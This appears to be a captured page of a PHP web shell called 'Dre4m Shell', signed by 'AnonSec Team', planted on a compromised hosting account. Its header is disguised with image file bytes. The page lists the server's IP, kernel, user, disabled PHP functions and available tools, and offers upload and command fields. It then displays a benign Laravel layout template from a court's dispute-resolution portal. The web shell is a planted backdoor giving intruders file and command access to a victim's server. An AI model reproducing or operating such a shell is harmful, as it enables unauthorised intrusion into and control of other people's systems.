ÿØÿàJFIFÿáExifMM*ÿÛC  Dre4m Was Here
Dre4m Shell
Server IP : 199.250.214.225  /  Your IP : 3.137.187.88
Web Server : Apache
System : Linux vps64074.inmotionhosting.com 3.10.0-1160.105.1.vz7.214.3 #1 SMP Tue Jan 9 19:45:01 MSK 2024 x86_64
User : nicngo5 ( 1001)
PHP Version : 7.4.33
Disable Function : exec,passthru,shell_exec,system
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : OFF
Directory :  /home/nicngo5/nicnwebsiteUpgrade/resources/views/layouts/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /home/nicngo5/nicnwebsiteUpgrade/resources/views/layouts/layoutAdr.blade.php
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta name="description" content="">
    <meta name="author" content="">
    <title>@yield('pageTitle') :: NICN</title>
    <!---header---->
    <link href="{{asset('adrAsset/css/bootstrap.min.css')}}" rel="stylesheet">
    <link href="{{asset('adrAsset/css/font-awesome.min.css')}}" rel="stylesheet">
    <link href="{{asset('adrAsset/css/prettyPhoto.css')}}" rel="stylesheet">
    <link href="{{asset('adrAsset/css/animate.css')}}" rel="stylesheet">
    <link href="{{asset('adrAsset/css/main.css')}}" rel="stylesheet">
    <!--[if lt IE 9]>
    <script src="js/html5shiv.js"></script>
    <script src="js/respond.min.js"></script>
    <![endif]-->       
     <link href="{{asset('adrAsset/css/bootstrap.min.css')}}" rel="stylesheet">
    <link href="{{asset('adrAsset/css/font-awesome.min.css')}}" rel="stylesheet">
    <link href="{{asset('adrAsset/css/prettyPhoto.css')}}" rel="stylesheet">
    <link href="{{asset('adrAsset/css/animate.css')}}" rel="stylesheet">
    <link href="{{asset('adrAsset/css/main.css')}}" rel="stylesheet">
    <!--[if lt IE 9]>
    <script src="js/html5shiv.js"></script>
    <script src="js/respond.min.js"></script>
    <![endif]-->       
    <link rel="shortcut icon" href="{{asset('adrAsset/images/flogo.jpg')}}">
    <link rel="apple-touch-icon-precomposed" sizes="144x144" href="{{asset('adrAsset/images/ico/apple-touch-icon-144-precomposed.png')}}">
    <link rel="apple-touch-icon-precomposed" sizes="114x114" href="{{asset('adrAsset/images/ico/apple-touch-icon-114-precomposed.png')}}">
    <link rel="apple-touch-icon-precomposed" sizes="72x72" href="{{asset('adrAsset/images/ico/apple-touch-icon-72-precomposed.png')}}">
    <link rel="apple-touch-icon-precomposed" href="{{asset('adrAsset/images/ico/apple-touch-icon-57-precomposed.png')}}">
    <!--/header-->
    <style type="text/css">
        .navbar .navbar-nav {
            display: inline-block;
            float: none;
        }

        .navbar {
            min-height: 100px;
        }

        .navbar-brand {
            padding: 0 15px;
            height: 40px;
            line-height: 40px;
        }

        .navbar-brand, .navbar-nav li a {
            line-height: 50px;
            /*height: 60px;*/
            padding:5px 10px;
            padding-top: 0;
            margin: 0px 2px;
        }

        .navbar .navbar-collapse {
            text-align: center;
        }

        .navbar-collapse {
            min-height:60px;
        }

        .navbar-toggle {
            margin-right:28px;;
        }
        .div-circle{
            border-radius: 100%; 
            border: 2px solid green; 
            height: 60px; 
            width: 60px; 
            padding: 3%;
        }
        .footer-a{
            color: white;
        }
        li>a{
            color: green !important;
        }
        @media(min-width:992px){
            .img-width{
                width: 300px;
            }
        }
        @media(min-width:1024px){
            .img-width{
                width: 400px;
            }
        }
        @media(max-width:400px){
            .img-width{
                width: 180px;
            }
            .marginLeft{
                margin-left: 4px !important;
            }
        }
        @media(max-width:736px){
            .img-width{
                width: 230px;
            }
            .marginLeft{
                margin-left: 4px !important;
            }
        }
        .media-body>h3{
            color: green;
        }
        .header-ban{
            background: #f9f9f9;
            padding: 15px;
            font-weight: bolder;
            font-size: 16px;
            margin-bottom: 10px;
        }
    </style>
    @yield('styles')
</head><!--/head-->
<body>
    <!---header---->
   <header style="background: white !important;">
           <nav class="navbar navbar-default navbar-fixed-top" style="background: white;">
              <div class="container-fluid" style="padding: 1% 8% 0 0;">
                <!-- Brand and toggle get grouped for better mobile display -->
                <div class="navbar-header row">
                    <div align="left" class="col-sm-2 col-xs-2">
                          <button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#bs-example-navbar-collapse-1" aria-expanded="false" style="position: absolute; margin-left: 20px;">
                            <span class="sr-only">Toggle navigation</span>
                            <span class="icon-bar"></span>
                            <span class="icon-bar"></span>
                            <span class="icon-bar"></span>
                          </button>
                    </div>
                    <div align="left" class="col-sm-10 col-xs-10">
                        <a class="navbar-brand" href="{{url('/adr-portal')}}">
                            <img src="{{asset('adrAsset/images/log.png')}}" alt="logo" class="img-width">
                        </a>
                    </div>
                </div>

                <!-- Collect the nav links, forms, and other content for toggling -->
                <div class="collapse navbar-collapse" id="bs-example-navbar-collapse-1">
                  <ul class="nav navbar-nav navbar-right">
                    <li class="@yield('currentHome')"><a href="{{url('/adr-portal')}}">Home</a></li>
                    <li class="@yield('currentAbout')"><a href="{{url('/portal/adr-about')}}">About Us</a></li>
                    <li class="@yield('currentJudges')"><a href="{{url('/judicial-cadre')}}">Judges</a></li>
                    <li class="@yield('currentProfile')"><a href="{{url('/portal/adr-profile')}}">Profile</a></li>
                    <!--<li class="@yield('currentGallery')"><a href="gallery.php">Gallery</a></li> -->
                    <li class="@yield('currentContact')"><a href="{{url('/portal/adr-contact-us')}}">Contact Us</a></li>
                    <li class=""><a href="{{url('/')}}" class="btn btn-default">Back To NICN Website</a></li>
                  </ul>
                </div><!-- /.navbar-collapse -->

              </div><!-- /.container-fluid -->
            </nav>
    </header><!--/header-->
   <!--/header-->



        <!-- content -->

        @yield('content')

        <!-- /content -->



<section id="bottom" class="" style="background: green; color: white;">
        <div class="container">
            <div class="row">
                <div class="col-md-4 col-sm-6">
                    <h4>ABOUT ADR</h4>
                    <br/>
                    <p>
                        The Alternative Dispute Resolution Centre is established to resolve certain disputes arising from labour, 
                        employment, industrial relations, workplace, etc, between parties using the process of mediation and/or conciliation.
                        The Centre uses mediation and/or conciliation technique(s) to assist parties resolve their dispute and arriveat 
                        mutually acceptable agreement In less costly, speedy and efficient manner. 
                    </p>
                <br/>
            </div><!--/.col-md-3-->
           
            <div class="col-md-4 col-sm-6">
                <h4>ADDRESS</h4>
                <br/>
                <address>
                    <strong>Abuja: </strong><br>
                       No. 3, Aguleri Street, off Gimbiya Street, Area 11, Garki, Abuja<br><br>
                    <strong>Phone: </strong><br>
                    07040101220, 07040101201<br><br>
                    <strong>Email: </strong></br> 
                    <a href="mailto:info@adr.nicn.gov.ng.com?Subject=Inquiry" target="_top" style="color: white;">info@adr.nicn.gov.ng</a>
                    <br>
                </address>
        </div> <!--/.col-md-3-->
        
        <div class="col-md-4 col-sm-6">
            <h4>VIDEO</h4>
            <div>    
                <iframe width="240" height="200" src="https://www.youtube.com/embed/R8aS1lZGYM8?rel=0" frameborder="0" allowfullscreen></iframe>
            </div>
        </div><!--/.col-md-3-->

    </div>
    </div>
    </section><!--/#bottom-->

     <div class="midnight-blue" style="background-color:white; color: green">
     <br/>
        <div class="container">
            <div class="row">
                <div class="col-sm-6">
                    <a href="faq.php" class="footer-a"> FAQ</a> &nbsp;&nbsp;  &copy; {{date('Y')}} ADR-NICN. All Rights Reserved.
                </div>
                <div class="col-sm-6">
                    <ul class="pull-right" style="color: purple;">
                        Developed by 
                        <a href="http://www.mbrcomputers.net" target="_blank" class="footer-a" style="color: purple;">
                           MBR Computer Consultants Ltd
                        </a>   
                    </ul>
                </div>
            </div>
        </div>
        </div>

    <script src="{{asset('adrAsset/js/jquery.js')}}"></script>
    <script src="{{asset('adrAsset/js/bootstrap.min.js')}}"></script>
    <script src="{{asset('adrAsset/js/jquery.prettyPhoto.js')}}"></script>
    <script src="{{asset('adrAsset/js/main.js')}}"></script>
    @yield('scripts')
</body>
</html>

Anon7 - 2022
AnonSec Team